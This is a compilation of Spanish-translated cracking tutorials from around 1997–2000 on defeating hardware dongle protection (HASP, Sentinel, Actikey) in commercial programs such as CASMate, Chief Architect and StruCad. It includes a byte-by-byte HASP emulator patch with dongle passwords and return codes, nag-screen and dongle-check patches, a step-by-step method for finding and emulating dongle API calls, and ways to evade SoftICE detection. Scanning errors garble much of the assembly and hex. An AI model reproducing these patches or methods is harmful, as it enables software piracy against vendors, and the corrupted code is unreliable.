ADD con nuestra corriente de byte para generar las 2 siguientes words y entonces parchear al final para obtener todo de nuevo 
preparados para la tercera ronda de word, hasta nunca entorno XD. 


HASP API 


Lo que nos queda ahora de nuevo es la API, supongo que tienes tu viejo haspman.pdf. En la antigua HASP de 16 bytes que 
hemos visto, PrestoChangoSelector era un buen bpx para localizar el código justo antes del entry point del HASP, CASMate 
tiene una rápida dirección de las llamadas INT utilizando una antigua alternativa(FreeSelector). Es muy fácil encontrar esta 
dirección con un edito HEX, sólo localiza 'HASPDOSDRV' y cambia el siguiente JMP E9 a ES (siempre es un entry point del 
APD. 


Primero está (Service 1), no hay problema,parcheamos en AX=1 y seguimos, entonces tenemos 6 posibilidades en el 
HaspCode (Service 2), hacer creer que CX/DX son los passwords para los dongles específicos. 


239F:C863 PUSH DS 


239F: 
239F: 
239F": 
239F: 
239F: 
239F: 
239F: 
239F: 
239F: 
239F: 
Z39F” 
239F: 


C864 
C865 
C866 
Cc867 
Cc868 
C86B 
c86€ 
C86D 
C86E 
Cc86F 
c870 
ce71 


PUSH ES 
PUSH SI 
PUSH DI 


PUSH BP <-— Los parámetros deben de ser apuntados aquí. 


JMP 
POP 
POP 
POP 
POP 
POP 
POP 
RETE 


BP 
DI 
SI 
ES 
DS 
BP 


0D2D <-- HASP entry point. 


Parejas de Passwords: 5804/30B4 3EB5/5C72 EE5A/C764 3EBD/5A5B 
FC73/1164 13D5/23EF 


Ya casi al final de esto CASMate una séptima comprobación de Service 2 comprobando la duplicación del segundo par de 
passwords(CX=3EB5, DX=5C72). Mi mejor teoría apunta a que cada código controla una forma específica de dongle así que 
yo tengo que recurrir a la confirmación de que soy un usuario registrado con el cuarto par aunque yo no veo ninguna otra razón 
por la que deba ser posible forzar los otros para que funcionen. 


F519h - Regresa al código 4232, D2B3, F168 y 6654. 
BF21h - Regresa al código D65F, 6AED, 1EDC y 9DO0E. 


Emulación Finalizada 


En primer lugar cambia el entry point del Hasp JMP en el offset (E9 --> ES), esto nos proporciona una manera fácil de regresar 
de nuestro emulador. Estoy casi seguro de que CASMate utiliza un MemoHASP nosotros emularemos los siguientes services 
(1, 2, 3, 4, 5, 6, 32 y 33). Os muestro el código más abajo:- 


:120D2D CALL $+5 (E8 00 00) 

:120D30 POP BP (5D) 

:120D31 OR BH, BH (0A FF) 

:120D33 JZ 120D6D (74 38) <-- Falsificación correcta del service. 
:120D35 CMP BH, 1 (80 FF 01) <-- IsHasp(). 

:120D38 JNZ 120D3E (75 04) <-- Comprueba el siguiente service. 
:120D3A MOV AX, 1 (B8 01 00) <--— HASP found. 

:120D3D RET (C3) <--— Regresa del emulador. 

:120D3E CMP BH, 2 (80 FF 02) <-- HaspCode(). 

:120D41 JNZ 120D76 (75 33) <-- Comprueba el siguiente service. 
:120D43 CMP CX, O3EBD (81 F9 BD 3E) <-- Comprueba si el password es correcto l. 
:120D47 JNZ 120D6D (75 24) <-- Password incorrecto. 

:120D49 CMP AX, 0F519 (3D 19 F5) <--— Comprueba el código. 
:120D4C JNZ 120D5B (75 0D) 

:120D4E MOV AX, 04232 (B8 32 42) <-- Regreso 1. 

:120D51 MOV BX, 0D2B3 (BB B3 D2) <-- Regreso 2. 

:120D54 MOV CX, 0F168 (B9 68 F1) <-- Regreso 3. 

:120D57 MOV DX, 06654 (BA 5A 66) <-—- Regreso 4. 

:120D5A RET (C3) 

:120D5B CMP AX, OBF21 (3D 21 BF) < este es el código. 
:120D5E JNZ 120D6D (75 0D) 

:120D60 MOV AX, 0OD65F (B8 5F D6) <--— Regreso l. 

:120D63 MOV BX, OG6AED (BB ED 6A) <--— Regreso 2. 


:120D66 
:120D69 
:120D6C 
:120D6D 
:120D6F 
:120D71 
:120D73 
:120D75 
:120D76 
:120D79 
:120D7B 
memoria. 
:120D7F 
:120D81 
:120D83 
:120D85 
:120D87 
:120D89 
:120D8A 
:120D8D 
:120D8F 
:120D92 
:120D94 
:120D97 
:120D99 
:120D9B 
:120D9F 
:120DA1 
:120DA4 
:120DA7 
:120DA9 
:120DAA 
:120DAD 
:120DAF 
:120DB1 
:120DB2 
:120DB5 
:120DB7 
:120DBB 
:120DBD 
:120DBF 
:120DC1 
:120DC3 
:120DC4 
:120DC6 
:120DC7 
:120DC9 
:120DCB 


MOV CX, O1EDC (B9 DC 1E) <-- Regreso 3. 

MOV DX, O9DOE (BA OE 9D) <--— Regreso 4. 

RET (C3) 

XOR AX, AX (33 C0) <-- Vacía AX. 

XOR BX, BX (33 DB) <-- Vacía BX. 

XOR CX, CX (33 C9) <-- Vacía CX. 

XOR DX, DX (33 D2) <-- Vacía DX. 

RET (C3) <-- El Service 4 también regresa aquí. 
CMP BH, 3 (80 FF 03) <-- Lee Word. 

JNZ 120D8A (75 OF) 

LEA BX, [BP+009B] (8D 9E 9B 00) <--— Comienza la simulación del Dongle en 


SHL DI, 1 (D1 E7) 

MOV BX, [BX+DI] (8B 19) <--— Lee word. 

SHR DI, 1 (D1 EF) <--— Restaura DI. 

MOV AX, DI (8B C7) <-- Coloca la word leida en AX. 

XOR CX, CX (33 C9) <-- Vacía CX para finalizar. 

RET (C3) 

CMP BH, 4 (80 FF 04) <--— Escribe la Word. 

IZ 120D6D (74 DE) <--— Todo correcto. 

CMP BH, 5 (80 FF 05) <--— Estado del HASP 

JNZ 120D9C (75 08) <--— Comprueba el service siguiente. 
MOV AX, 1 (B8 01 00) 

MOV BX, AX (8B D8) 

MOV CX, AX (8B C8) <-- MemoHASP conectado. 

RET (C3) :120D9C CMP BH, 6 (80 FF 06) <--— HASPId. 

JNZ 120DAA (75 09) 

MOV AX, O (B8 00 00) <--— ID bajo. 

MOV BX, O (BB 00 00) <--— ID superior. 

XOR CX, CX (33 C9) <-- Finaliza CX=0. 

RET (C3) 

CMP BH, 33 (80 FF 33) <-- Escribe el bloque. 

JNZ 120DB2 (75 03) 

XOR CX, CX (33 C9) <-- Finaliza CX=0. 

RET (C3) 

CMP BH, 32 (80 FF 32) <--— Lee el bloque. 

JNZ 120D6D (75 B6) <-- Falsifica el éxito del proceso. 
LEA BX, [BP+009B] (8D 9E 9B 00) <-— Inicia el principio de la memoria Dongle. 
MOV CX, SI (8B CE) <-- Número de words a mover. 

SHL DI, 1 (D1 E7) 

LEA SI, [BX+DI] (8D 31) <-- lee de aquí. 

SHR DI, 1 (D1 EF) 

XCHG DI, AX (97) <--— lo mueve hacia aquí. 

REPZ MOVSW (F3 A5) <-- Mueve las words. 

XCHG DI, AX (97) <--— Restaura AX. 

XOR CX, CX (33 C9) <-- Finaliza CX=0. 

RET (C3) <-- Fín de la rutina de emulación. 

DB dup 112(0) <-- Comienzo de la memoria de emulación. 


El código que se observa aquí es el service 32h (50) el cuál lee 38h words del dongle. Después de la primera lectura del Service 
6 le la ID del dongle y después de una lejana llamada al service 32h se utiliza para comprobar áreas de memoria del dongle (De 


hecho en el 


HASPld es almacenado en las words 3 y 4 de nuestra memoria de simulación), así que vamos a asegurarnos de que 


corresponde con el anteriormente citado service 6 parcheado en la citada emulación. 


Las opciones son controladas por varias words, recomiendo colocar un bpr en el área completa, un buen truco es etiquetar tu 


memoria emulada consecutivamente por ejemplo: 00, 01, 02, 03, esto debería hacer más fácil de ver las posiciones que están 
siendo usadas. Hay 3 comprobaciones de DWORD que deben ser corregidas. 


cs:0B48 CMP EAX,ES: [BX+02] <-- primera comprobación (bytes 0,1,2,3). 
cs:0B4D JZ 0B53 <-— Salto Bueno. 


Shaman's crack (¿ ?) 


Se que el site de Fravia ya alberga un ensayo de CASMate todavía puede ser que tenga algunos errores estéticos, por ejemplo 
Shaman en verdad no regresa todos los códigos correctos con el Service 2, el además confunde los parámetros de regreso del 
Service 5 y del Service 3 (también tiene algunas erratas que también yo debo tener). Si tu eres propietario de CASMate, 
debería serte posible utilizar tu editor Hex para parchear en los bytes que yo te he mostrado y entonces eliminar cualquier 
dongle existente y copiar su contenido a la memoria de simulación. 


O 1999 CrackZ. 21st October 1999. 


Traducido por John Keeper 2.000 JKEEPEROCORREO.DE 


Chief Architect 97, v5.0 - Tutorial Traducido por “[G]oLe[E]" 
Uv 


Nota del Traductor 


Un Saludo muy especial a toda la comunidad Cracker Hispana, en especial a los crackers latinoamericanos, Saludos a Karpoff, 
a WKT y a los del ECD, animo, que Ustedes son como gotas de agua en el desierto, en el desierto en que nos encontramos los 
que queremos aprender y ser una nueva generación de CrAcKeRs. 


Archivos disponibles según petición (Requieren Directx). 


Regresé de nuevo, esta vez estoy usando Chief Architect como mi objetivo, Chief usa una combinación de Número de Serie y 
Dongle para su Protección, aunque la implementación es algo dudosa. También si tuvieras necesidad de llamar al Servicio 
Técnico de ART, solo espero que tengas las bolsas llenas, ya que con la tarifa de $2 el minuto, tu problema son sus ganancias. 


La Dongle que está siendo usada, es una Super Sentinel Pro (Super Centinela Pro), notaras el archivo instalado superpro.dll 
como el dll del fabricante, interesantemente, puedes borrar este archivo sin ningún tipo de mensaje de error de parte del 
programa, lo cual sugiere que el dll no esta ligado al programa principal. Comenzando Chief, da cabida a una NAG, los 
usuarios legítimos, deben ingresar su nombre, Número de Serie, y Password (obtenidos de ART) y entonces comenzar el 
programa sin problema (este loca orden de eventos, niega el punto de que se está usando una Dongle!). 


El autochequeo del numero de serie (él mismo se checa), es tan trivial que cualquiera podría desviarlo y fijarlo para que cada 
vez que clickeemos O.K., acepte un mal Password. Usas el bpx standard (GetWindowTextA) y haces el código a tu propia 
manera (recuerda dar el formato con un buen estilo a tu nombre, por ejemplo CrackZ N. Cracker y asegurarte que tu numero de 
serie tiene una longitud <3). 


:00683261 
:00683268 
:0068326D 
:006832AD 


MOVSX EAX, WORD PTR [006E3050] <-- Localización del Gatillo. 
CMP EAX, 358 <--— El buen resultado. 

JZ 006832A7 <-- Salto_al Buen _Número_de Serie. 

CALL USER32.EndDialog <-- Adiós a la nag screen. 


Este chequeo es tan débil que muchos Crackers elegirían parchear esto, y apostar por la NAG, evidentemente, no hay ninguna 
ventaja real en trabajar a través de una rutina de calculo de Password, porque el Código de ART cambia cada vez. En lugar de 
esto, nos concentraremos en crackear el chequeo Dongle, la Dongle determina cuando o no, la NAG Screen aparece y por 
alguna extraña razón, ART decidió que un chequeo al inicio, era suficiente y la Dongle nunca es llamada mientras el programa 
esta corriendo actualmente (que tan estúpido es eso?). 


Un bpio -h 378 rw trabaja bien, pero prepárate para un trabajo duro con F12. Encontraras el punto más conveniente en 
006835BF, una lista en desensamblador también ayudaría (nota cuantas veces es referido este CALL). 


:006835BA CALL 00683306 <-- Lee la Dongle. 

:006835BF ADD ESP,04 <-- Pila Correcta (SoftICE hace un alto acá). 
:006835C2 MOV WORD PTR [EBP-04], AX <-- Usa el valor de AX. 

:006835C6 MOVSX ECX, WORD PTR [EBP-04] <-- Ahora lo recupera para ECX. 
:006835CA CMP ECX,01 <-- Chequearlo. 

:006835CD JNZ 006835E1l <d-- Salta _y Chekamos_EBP-04_otra_vez. 
:006835CF MOV WORD PTR [006DF5E0],0001 <-- bonita Flag. 


Este simple chekeo es lamentable y el único pensamiento que podrías tener es parchear efectivamente (el espacio de la 


dirección del JNZ). Este apacible interés es para rastrear un poco mas allá, el siguiente código de chequeo es diabólico, 
obviamente, el programador pensó que estaba haciendo chekeos extras, cambiando valores de variables, pero bajo la luz del 
ASM, este no es mi análisis. Te gustaría observar que pasa cuando este código falla? alguna información wrt puede ser 
recogida con la API. 


De hecho, una vez el chequeo de la Dongle es parcheado, lo peor viene. Pensarías en un Numero de serie válido, para ser 
chequeado (aun con la Dongle conectada), increíblemente al programa no le importa. Esta protección es tan débil, que no 
pienso comentar mas. 


O 1998 CrackZ. 1st December 1998. 


Zen y el Arte de Crackear Dongles 
(Un ensayo de algún modo ' general ' sobre los dongles). 


por zeezee, (24 de diciembre de 1997 ) 


Manifiesto: - Yo no publicare aquí ningún nombre de programa protegido por dongles ya que no es mi objetivo tener batallas 
con abogados, veras sólo recortes del código pertinente. Este tutorial no es sobre un software o dongle especificó. El ejemplo 
dado no es de un programa real ampliamente disponible. El propio programa no es importante. Así que, empecemos con los 
fundamentos. Los Dongles son unas pequeñas cajas conectadas al puerto LPT (o a veces al puerto COM) de tu ordenador. 
Ellos deben ser (de hecho lo son en 99%) invisibles para las impresoras conectadas a este puerto. 


Hay variantes de dongles montados dentro del ordenador pero para nosotros, la apariencia exacta del dongle no es importante. 
Dentro del dongle está un EEPROM o ASIC. Para nosotros esto es sólo una caja negra que recibe / envía datos de nuestra 
aplicación vía un pedazo de software (dongle API) qué es vendido con el dongle a los diseñadores. Los escritores de la 
aplicación llaman al API y comprueban que valores son devueltos para hacer saltos del tipo de good/bad. 


Los Dongles mas populares son: - Sentinel (gran familia) de Rainbow Technologies (USA) - HASP (no es malo) de Aladdin 
(Israel) - Fest (si recuerdo bien hecho en Alemania) - Actikey (Francia) y decenas de otros... Mira tu favorito en la página del 
Dr Dobb. 


Las Herramientas necesarias son habituales: - 
IDA, SoftICE, Hiew y por supuesto nuestra aplicación. 


Ningún analizador lógico, osciloscopio, quizá el monitor LED si realmente lo quieres. Así que, el primer paso en nuestro 
tutorial es: - 


1. Identifica el dongle con el que estás tratando. No es tan difícil en la mayoría los casos. Cualquier mirada al dongle si tienes 
acceso a él, o mira todos los archivos que se instalan con tu objetivo, entonces puedes investigar todos .DLL, .VXD etc. por el 
texto del copyright u otra cosa de los autores de la aplicación. Lo encontrarás rápidamente en casi todos casos. 


2. Recoge toda la información posible de las páginas WWW de los vendedores del dongle. Esto es UN PASO MUY 
IMPORTANTE!. Te sorprenderás de cuánta documentación puedes conseguir, el API completo, a menudo con la fuente, el 
software de demostración, ejemplos de cómo usar el API con tu futuro programa etc. Hazte con todo y estúdialo 
cuidadosamente. Recuerda: - TODOS los vendedores del dongle están presentes en la Red. Simplemente encuéntralos. No te 
asustes cuando hayas leído todo sobre la seguridad del dongle. Ellos SON seguros. OK. No puedes crackearlos a menos que 
estén hechos por completos idiotas. OK. Pero quieres craquear la aplicación, NO el dongle. Cuando leas sobre el encriptado de 
RSA, las funciones unidireccionales y observes en el API alguna Pregunta/Respuesta interesante desmenuzando funciones, 
recuerda que es sólo un API. Nadie lo usa. Únicamente son usadas funciones simples como Comprobar/número de serie/Leer y 
a veces Escribir. 


3. También puedes recibir un dongle de evaluación del distribuidor del dongle gratis. Si no gratis pregunta por 14-días de 
prueba. ¡Funciona! Ellos quieren vender estas cajas. Llama a estos números 0800 o 0130. Ellos querrán ayudarte a menos que 
digas algo tonto cuando pregunten por el software que quieres proteger. Las personas de Rainbow y Aladdin son 
_extremadamente_ serviciales. 


4. Ahora conoces el dongle/app que quieres crackear y tienes (o no) alguna información adicional. Tiempo para pensar. 
Imagina una compañía de software que hace un programa. El proyecto casi está terminado, entonces viene el jefe y dice: "OK, 


estamos listos, ahora es el tiempo de proteger nuestro fantástico producto. Tenemos un kit de demostración del dongle X. Así 
que, estimados programadores, úsenlo.” Y los pobres programadores están estudiando documentación del dongle, API etc. y 
poniendo algunas llamadas de API en su código. Algunas veces acaba así: - 


call DONGLE 
or ax, ax 

Jjz buenchico 
chicomalo 


Sí, no puedes creerlo, sin embargo es real. A veces ellos van un poco más allá pero en la mayoría los casos, yo repito: en la 
MAYORIA de los casos la idea es estúpida. Pero la cadena sólo es tan fuerte como su eslabón más débil. Y en todos los 4 
programas diferentes que yo probé con dongles diferentes, el eslabón más débil era la interface: - 


Aplicación - Dongle API (principalmente contenido en un DLL). 


Los fabricantes del dongle son tipos inteligentes, ellos saben encriptar datos, hacer código auto-modificable, trucos anti-debug 
etc. yo te recomiendo: - Deja su código como está. El lado de la aplicación es mucho más fácil de crackear. La primera cosa en 
el crack real es encontrar LA llamada (raramente más de una) al dongle API, Usa IDA o W32Dasm y recuerda el nombre del 
DLL que contiene el dongle API y después de varios minutos (¡pasadas 2 horas y 40Mb de archivo .IDB!) lo tienes. 


Debe haber una parte de API estáticamente unida al ejecutable que nosotros estamos crackeando qué llama al DLL, los 
graciosos de Aladdin hacen un código auto-modificable aquí, así que nuestra meta esta subiendo un poco. Nuestros pobres 
programadores son perezosos. Todos son perezosos cuando llegan a la llamada del dongle. Así que ellos escriben sus propias 
funciones como: QuickCheckIfDonglePresent (O), GetDongleSerialNumber () ReadDongleByte (addr) - o word, o dword, o 
incluso la tabla completa WriteDongleByte (addr, valor). ¿Quizá ellos están exportados por nombre? ¿Quizá el nombre es 
ReadDongle o similar? Mira cuidadosamente las referencias que IDA te da. Lo encontrarás seguramente. 


Debes encontrar procs llamados una sola vez - ellos deben ser interfaces entre la aplicación/API. ¿Quién escribe dos envolturas 
para una función? El dongle API está muy bien estructurado en la mayoría los casos, el número de la función está dado 
explícitamente, O - comprueba, 1 - consigue número, 2 - lee, 3 - escribe, etc... Identifica donde están los parámetros/resultados. 
Y esta es la cosa que nos ayuda a crackear. ¡Nosotros también podemos tener los docs del API! Los productores del API 
quieren hacer el API lo más fácil de usar. Ellos también lo hacen más fácil de crackear... 


Nosotros podemos encontrar rápidamente lo que el app espera del dongle estudiando las llamadas del API y los ' cmp ax' que lo 
siguen. 


5. Entonces viene la parte activa (puedes necesitar el dongle por un periodo corto de tiempo) parchea el código insertando un 
byte CC en el lugares) del Interface del 'App-APT'. Ejecuta SoftI[CE con BPINT 3. Reemplaza INT 3 con el byte original, 
entonces pon un BPX a esta dirección, rastrea... Mira lo que pasa cuando allí no hay ningún dongle. Puedes tener suerte y 
puedes encontrar rápidamente un checkpoint con un interruptor del tipo de bad/good. Intenta ir de la otra manera y ver lo que 
pasa (quizá tu objetivo comienza a correr). Intenta parchear el código para emular la función de QuickCheckIfDonglePresent. 
Simplemente devuelve un valor que satisfaga al proc llamado. Esto puede ser suficiente en la mayoría de los estúpidos casos. 
Entonces intenta emular la rutina GetSerial +. Recuerda que el + de serie del dongle puede guardarse y ser usado para 
visualizarse en el apartado About. Mira las referencias que IDA te da. No todos los dongles tienen el proc GetSerial +. A veces 
los +* de serie son leídos como datos normales desde el dongle. Esto puede ser suficiente en la mayoría los casos no-tan- 
estúpidos. Y entonces viene al dongle a leer. Varios bytes son leídos, yo asumo que encuentras el lugar donde ellos se guardan 
y todas las referencias a este lugar. 


Varios controles pueden ocurrir y ciertamente ocurrirán en programas con opciones diferentes habilitadas / desactivado por el 
dongle. (Ej. un ejemplo real de uno de los principales programas de SCADA): - 


cmp eax, some _valuel 
je is_model_1 
cmp eax, some_value2 
je is_model_2 


O quizá (ejemplo real de un programa israelita con dongle israelita): - 


test eax, mask_1 
jz labl 
call enable _option_1 


lab1l: etc. 


O quizá (electrical engineering tools hechas en Francia con dongle francés): - 


12 palabras leídas por el dongle se guardan desde [ebx] 
mov ecx, 12 


lab1: cmp word ptr [ebx], 1 
jne lab2 
call enable_option (cx) 


lab2: inc ebx 
loop labl 


Créeme. Es real. Si tienes un dongle trabajando, lees todo los valores de él, y sabes qué emular (pon un BPX después de que el 
API lee la función que hace el trabajo y toma notas). Y aquí el ejemplo real. Este app es inútil para ti, no está libremente 
disponible, así que estudiemos el desensamblado que yo preparé para ti. 


1. Nuestros dongle son que Actikey francés y el DLL son CCNMMNT.DLL. 


2. Hacemos un desensamblado de nuestro objetivo (40 Mb) y miramos en la sección .idata. Lleva un poco más de tiempo que 
un cocktail... El resultado es asombroso, pero yo esperé hasta que TODAS las referencias fueron expuestas. 


3. Ctrl-s y vamos a la sección .idata. Encontré importaciones externas desde CCNMMNT.DLL Vamos a la referencia de ello. 


00594510 ; Imports from CCNMMNT.d11 
00594510 00594510 extrn CCNMM:dword ; DATA XREF: jJ_CCNMMr Solo una referencia! 


¡El nombre ¡_CCNMM es asignado por IDA! entonces: 00408770; Subrutina 00408770 


00408770 3_CCNMM proc near ; CODE XREF: key_io+6Fp 00408770 jmp ds:CCNMM ; Salta a 
Dongle DLL 00408770 3_CCNMM endp 


El nombre key_io y el otro de debajo son asignado por mí, ellos no se exportan; -) subimos un paso. Mira: Sólo una referencia. 
¡Luz verde! Estamos en el buen camino. entonces: - 


0040BA10 key_io proc near ; CODE XREF: main _key_check+8 0040BA10 ; 
main_key_check+18Cp. 
0040BA10 ; key_check2+45p 


Después del control, yo encontré que key_check2 es llamado sólo desde el main_key_check, así que nosotros todavía tenemos 
sólo una referencia aquí. Todavía estamos dentro del código del dongle API. Subamos: - 


0040B840 ;Subrout ine 0040B840 0040B840 main_key_check proc near ; CODE 
XREF: key _fun_00+4Dp 0040B840 ; keyfn_18_sernum+68p 

0040B840 ; keyfn_02 write+5Bp 

0040B840 ; keyfn_03_read+56p 

0040B840 ; key_fun_1b+50p 

0040B840 ; key_fun _1c+54p 

0040B840 ; key_fun_1d+5Cp 


Por supuesto puedes preguntar, ¿cómo sé yo que esto es el API y no nuestra aplicación? Respuesta rápida: ¡Las funciones 1b, 
lc y 1d no son llamadas! ¿Te imaginas escribiendo envolturas que nunca se llaman? Ellos fueron escritos por los fabricantes 
del dongle y se enlazaron al app. De hecho keyfn_02_write tampoco es llamado. Esto son buenas noticias, la clave siempre 
debe responder con los mismos datos. Los nombres de los llamadores son auto explicativos. ¿Desde dónde los conseguí yo? 
Estudiando el procs, eso es todo, mira un ejemplo :- 


0040A250 keyfn_18_sernum proc near ; CODE XREF: (varios) 


0040A250 0040A250 arg_0 = dword ptr 8 0040A250 
0040A250 push esi 

0040A251 call key_fun_00 

0040A256 cmp ax, 1 

0040A25A 3jnz short skc110 

0040A25C mov ax, 1 ; 1 -— error? 

0040A260 pop esi 

0040A261 retn 0040A262 


skcl110: 

0040A262 mov word ptr ds:key_fun, 18h ; funcion 18!!! 
0040A26B xor eax, eax 

0040A26D mov esi, [esp+4+arg_0] 

0040A271 mov word ptr ds:key_result_1, magicl 
0040A27A mov word ptr ds:key_par3, ax 

0040A280 push offset key_par4 

0040A285 mov word ptr ds:key_par!, ax 

0040A28B push offset key_par3 

0040A290 mov word ptr ds:key_parl, magic2 

0040A299 mov word ptr ds:key_par2, magic3 

0040A2A2 push offset key_par2 

0040A2A7 mov [esil], eax 

0040A2A9 push offset key_parl 

0040A2AE push offset key_result_1 

0040A2B3 push offset key_fun 

0040A2B8 call main_key_check ¡¿ aquí nuestra llamada 
0040A2BD mov word ptr ds:main_result, ax 

0040A2C3 add esp, 18h ....guarda results... 


Los valores mágicos están identificando el dongle y el producto, así que yo los quité... ellos son insignificantes para nuestro 
cracking. Ahora es tiempo para identificar lo que el API está esperado devolver. Varios ' cmp ax, something' y yo pude emular 
las funciones del API 00 (control rápido) y 18 (consegir el serial). Yo apliqué un pequeño parche usando Hiew para emular 
estas funciones. Después de que mi programa empezó con todas las opciones desactivadas. Analizando otro ' cmp ax, 


something' era casi insignificante. Así que yo escribí un pequeño emulador de key_fn_02_read y ahora el proggy abre todas las 
Opciones para mí. 


Conclusiones: - crackear los Dongles no es mucho más complicado que craquear numeros de serie. Necesitas más fondo 
teórico de los productores del dongle, un desensamblador bueno que encuentre todas las XRefs y SoftICE por supuesto. Las 
protecciones shareware son a menudo mucho más sofisticadas que las simples llamadas del dongle en caras apps comerciales. 
Hay programas mejor protegidos por supuesto, pero ellos son excepciones. 


* No empieces crackeando desde BPIO en puertos de LPT. Intenta encontrar El Eslabón más Débil!. 


* Recuerda, los programadores son perezosos cuando vienen a poner código exterior dentro del suyo propio. No todas las 
llamadas del API se usan. Comprueba las funciones más simples primero y ve lo que pasa. 


* Permite a tu programa crackeado correr durante varios minutos. Casi siempre hay un control del dongle realizado cada 1 
minuto o así. Tu crujido debe sobrevivir a esto. Prueba todas las acciones que el programa debe realizar. Selecciona cada 
artículo del menú. O, si lo prefieres, estudia el desensamblado entero para las llamadas del dongle... 


* Ten cuidado cuando crackees con el dongles real conectado. Allí está teóricamente la posibilidad de destruir un dongle. Sólo 
usa los dongles para leer sus contenidos y quítalos cuando craquees con SoftICE. Ellos no son necesarios en éste momento: -) 
Sin embargo yo nunca encontré ningún procedimiento de auto-destrucción al estudiar varios dongles API. ¡No obstante, estás 
advertido! ¡Buena suerte! 


Zeezeoe 


Traducido por Txeli 


http://club.telepolis.com/txelienlinea/index.htm 


Matchmover - Tutorial by Kashmir 


Traducción de “*[G]oLe[E]* 


"Un corto, pero invaluable tutorial de un ex-SiEGE, colega mio. Solamente va para mostrar que un buen tutorial no necesita 
ningun code snippet cuando está empacado con información útil acerca de InstallShield £ HASP cracking, digo que Aladino 
no esta en este esquema de envoltura gag*.mod que se vuelve un poco tedioso :-)". "Ligeramente editado por CrackZ". 


Parte 1 : Crackeando el InstallShield 


Localiza el chequeo en SoftICE con un bpx GetWindowTextA, siguiendo la entrada. Notaras cuando ira a través de algunos 
calculos y entonces ser chequeado contra algunos numeros, si es igual, retornara 1, de lo contrario, Cero. Este chequeo solo 
controla la activación del boton de Continuar. Usa algun password y cambia ese switch, entonces haz click en Continue, 
continua siguiendo el password. Pasaremos ese primer chequeo, y de nuevo el mismo tipo de comparación, si es igual salta, 
entonces notaras que el password es copiado y tirado en una rutina que consume mucho tiempo. 


Desensambla esta rutina. Notaras que primero, el password toma XORed con una doubleword, es decir cada 4 bytes toma 
XORed con la misma DWORD. Entonces un archivo temporal (el archivo actual de instalación) toma bytes tratados 
inteligentemente con la llave resultante, en una forma simple: los bits bajo y alto, son intercambiados y el byte resultante es 
XORed con un Byte llave. Este procedimiento toma lugar desde que el archivo temporal es grande. El archivo temporal 
“desencriptado” es ahora chequeado por su firma : los primeros 4 bytes deberian leer MSCF, esto nos da de hecho que los 
primeros 4 caracteres del password son ISE2. 


Ahora un simple criptoanalisis : incrementar la longitud del password hasta que veas partes reconocibles en el archivo temporal 
: esto pasara con una longitud de 5 y 10. Veras por ejemplo partes de la word como estas "isk1" "Dis" "out,"etc. Si lo 
comparas con un archivo InstallShield empaquetado, notaras que contiene frases como Diskl1Mayout.bin etc. Así que está claro 
que la longitud del pass es 10 y ahora es facil reconstruir los caracteres perdidos. 


Part 2 - Crackeando la HASP 


La envoltura HASP chequea el SoftICE. Está versión solo chequea probando a abrir el NTICE driver. Así, cambia cualquier 
nombre en tu SoftICE (en todos los archivos) o fija pon un bpx CreateFileA, su primer golpe será tratar de abrir NTICE, 
cambialo a algo mas, p.e.CreateFileA debería retornar -1. La Envoltura HASP usa un tedioso esquema de encriptación "Piel de 
Cebolla” : está construido de pequeñas rutinas con nombre *.mod. Cada mod comienza usualmente desencriptando el siguiente 
.mod, entonces si es un mod funcional, hace lo que supuestamente hace (por ejemplo killice.mod, detecta SoftICE hasperr.mod 
cuida de mensajes de erro de la DoNgLe, hasp.mod contiene las rutinas de acceso a la DoNgLe etc.) o si es un mod no 
funcional, los pasos fluyen al siguiente mod, quiza disimulando el flujo un poco, usando la interrupción que la manipula (flujo 
usando INT 3 o instrucciones ilegales). 


Nuestro trabajo es el siguiente, encontrar donde se desencripta hasp.mod, nota la rutina de desencriptación (imprimela) y sus 
argumentos. Las Rutinas de Desencriptación tienen como argumentos : offset (desde donde desencriptar), longitud (que tan 
largo es el mod a desencriptar) y un seed value (no estoy seguro, pero creo que esto quiere decir un valor sembrado, es decir, 
un valor default). No todas las rutinas de desencripción son rutinas, algunas son implementadas como un loop. Todas tienen la 
misma estructura, sin embargo, con algunos cambios menores. 


Codifica está rutina de encriptación en tu lenguaje familiar, desencripta el the hasp.mod. Parchea lo que quieras parchear y 
encripta de nuevo (para la encriptación puedes tener que hace algunos pequeños cambios en la rutina de encriptación). 


Para mamoe.exe trabaja así : bpx CreateFileA, cambiar NTICE en algo mas; ver dentro de la rutina que llamó CreateFileA, 
desplazarse un poco hacia arriba para encontrar la memoria que contiene la direccion del siguiente .mod (al principio de la 


rutina en la forma cmp [...],0 /jz ... Ahora fija un bpx en el comienzo de ese mod, chequear su nombre en la ventana de datos, 
estará al final de la rutina. Continua hasta que encuentres hasp.mod. 


La mayoria de mods con el nombre gag*, mod son mods no funcionales. Usualmente hasperr.mod vendrá un poco antes de 
hasp.mod. Usualmente pongo el emulador HASP en un dll que he construido con un punto de entrada GetEnvironmentStrings, 
eso es justamente para ser capaz de parchearlo minimamente. Nota la desencriptación del programa principal, basado en la 
rutina HaspCode. Su algoritmo es conocido (descubierto por UCL del Empaquetado de Encripción HASP). Alguna memoria 
leida desde la DoNgLe puede ser usada para fijar algunas flags, en el caso de Mamoe.exe, las direcciones 18h 8 19h, deberian 
estar en este caso O $2 FFFFh. 


Kashmir (June 2000). 


O Dongles O Return to Main Index 


O 1998, 1999, 2000 Hosted by CrackZ. Kashmir 8th June 2000. 


StruCad Drawing Viewer v2.05 - Tutorial by CrackZ 


Traducción de “[G]oLe[E]* 
Archivos disponibles a petición. 


StruCad Drawing Viewer (spfview.exe) es como los visores de programas de Microsoft, los cuales son usados por las personas 
que no tiene el software usado para crear el archivo original. Aunque StruCad ha escogido proteger su Visor (Viewer) con una 
Dongle Centinela y Código de Autorización Máquina-Dependiente, dudo que la publicación de este documento los dañe en 
alguna forma significativa. Nuestro interés en este objetivo, está relacionado solamente con los aspectos de la implementación 
de Centinela, Específicamente la lectura y los algoritmos de palabra Dongle. 


Usando IDA y las técnicas que describiré en otra parte, podemos identificar un tanto fácilmente el Record de Paquetes de 
fabricación del Centinela y comenzar nuestro intento de etiquetar las funciones varias y sus referencias, solamente las 7 
siguientes son de interés:- 


sub_46A77C, sub_46A92C, sub_46A9CO0, sub_46AAB4, sub_46ABFY4, sub_46AD98 áz sub_46AE724. 


Seguimos usando IDA y adoptamos una teoría de acercamiento a la verificación, sub_46A77C toma un parámetro (un PUSH 
EBX), justo sobre esta referencia, podemos ver sub_46A714 el cual toma EBX y 404h (1028 bytes), una mirada rápida a la 
guía APLI, confirma que esto debe ser sproFormatPacket(), con un razonable grado de seguridad, podemos asumir que EBX es 
